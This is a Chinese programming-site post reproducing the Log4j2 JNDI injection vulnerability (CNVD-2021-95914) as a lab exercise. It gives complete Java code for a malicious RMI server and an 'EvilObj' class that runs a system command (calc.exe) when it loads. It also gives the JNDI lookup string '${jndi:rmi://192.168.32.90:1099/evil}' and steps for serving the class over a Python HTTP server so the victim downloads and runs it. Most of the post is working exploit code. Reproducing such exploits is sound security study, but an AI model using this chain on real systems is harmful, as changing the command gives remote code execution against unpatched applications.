欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!

热门搜索/Hot Search

您现在的位置是: 首页

复制 log4j2 CNVD-2021-95914 漏洞。

最编程 2024-03-13 18:37:11
...
 1 package com.server;//package com.hns;
 2 
 3 import javax.lang.model.element.Name;
 4 import javax.naming.Context;
 5 import java.io.BufferedInputStream;
 6 import java.io.BufferedReader;
 7 import java.io.IOException;
 8 import java.io.InputStreamReader;
 9 import java.rmi.RemoteException;
10 import java.rmi.server.UnicastRemoteObject;
11 import java.util.HashMap;
12 
13 public class EvilObj extends UnicastRemoteObject {
14     protected EvilObj() throws RemoteException {
15     }
16 
17     public static void exec(String cmd) throws IOException {
18         String sb = "";
19         BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
20         BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));
21         String lineStr;
22         while((lineStr = inBr.readLine()) != null){
23             sb += lineStr+"\n";
24 
25         }
26         inBr.close();
27         inBr.close();
28     }
29 
30     public Object getObjectInstance(Object obj, Name name, Context context, HashMap<?, ?> environment) throws Exception{
31         return null;
32     }
33 
34     static {
35         try{
36             exec("calc.exe");
37         }catch (Exception e){
38             e.printStackTrace();
39         }
40     }
41 }

com.server.Server //rmi服务,绑定rmi注册表

 1 package com.server;
 2 
 3 import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 
 5 import javax.naming.NamingException;
 6 import javax.naming.Reference;
 7 import java.rmi.AlreadyBoundException;
 8 import java.rmi.RemoteException;
 9 import java.rmi.registry.LocateRegistry;
10 import java.rmi.registry.Registry;
11 
12 public class Server {
13     public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
14         System.setProperty("FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS", "true");
15         System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
16 
17         Registry registry = LocateRegistry.createRegistry(1099);
18         String url = "http://192.168.32.90:6666/"; //下载恶意代码的地址,被攻击者会到 http://192.168.32.90:6666/com/server/EvilObj.class下载恶意代码
19         System.out.println("Create RMI registry on port 1099"); 20 Reference reference = new Reference("com.server.EvilObj", "com.server.EvilObj", url);
21         ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 
22         registry.bind("evil", referenceWrapper); 
23  } 
24 }

 

Log4j2Client :Log4j2客户端代码

com.client.Client

 1 package com.client;
 2 
 3 import org.apache.logging.log4j.LogManager;
 4 import org.apache.logging.log4j.Logger;
 5 
 6 import javax.naming.NamingException;
 7 
 8 public class Client {
 9     private static Logger log = LogManager.getLogger(Client.class);
10     public static void main(String[] args) throws NamingException, InterruptedException {
11         System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
12         System.setProperty("FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS", "true");
13 //        Context context = new InitialContext();
14 //        context.lookup("rmi://192.168.32.90:1099/evil"); //直接请求rmi服务
15 
16         log.error("${jndi:rmi://192.168.32.90:1099/evil}"); //用jndi方式,拉取加载rmi服务
17     }
18 }

部署:

1、将RmiServer 项目部署到 一台远程的window电脑上(192.168.32.90),使用下面命令启动

1 D:\ProgramFiles\java\jdk1.8.0_121\bin\java.exe -cp RmiServer-1.0-SNAPSHOT.jar com.server.Server

2、在远程的window电脑上(192.168.32.90)上创建目录:D:\documents\desktop\test\ClassLoadHttpServer\com\server,里面放上 恶意代码的class文件:EvilObj.class

3、在D:\documents\desktop\test\ClassLoadHttpServer目录下,执行下面命令,启动一个http服务端,提供恶意代码的class文件给被攻击者下载

1 python -m http.server 6666

 

4、在本机上,启动Log4j2Client项目的 com.client.Client#main 方法,就会触发自己本机的计算器被启动

上一篇: 解决了 SpringBoot 雪花算法主键 ID 传递给前端后精度降低的问题

下一篇: Log4j2 JNDI 注入漏洞 (CVE-2021-44228) 漏洞恢复

推荐阅读